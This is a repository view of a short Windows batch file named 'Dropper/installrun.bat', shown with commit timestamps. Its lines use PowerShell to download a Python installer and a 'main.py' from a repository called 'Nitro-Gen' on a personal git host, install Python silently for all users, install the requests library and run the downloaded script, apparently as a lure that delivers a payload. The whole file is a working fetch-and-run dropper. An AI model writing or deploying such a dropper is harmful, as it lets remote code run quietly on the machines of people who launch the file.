Dropper/installrun.bat

6 lines
342 B
Batchfile
Raw Normal View History

2024-09-23 09:29:21 -04:00
powershell /c irm -uri "http://www.python.org/ftp/python/3.12.6/python-3.12.6-amd64.exe" -outfile "amd.exe"
powershell /c irm -uri "http://git.kevinthe.horse/heckeralt/Nitro-Gen/raw/branch/main/main.py" -outfile "main.py"
2024-09-23 09:12:25 -04:00
amd.exe /quiet InstallAllUsers=1 PrependPath=1 AssociateFiles=1
python -m pip install requests
python main.py
sleep 9999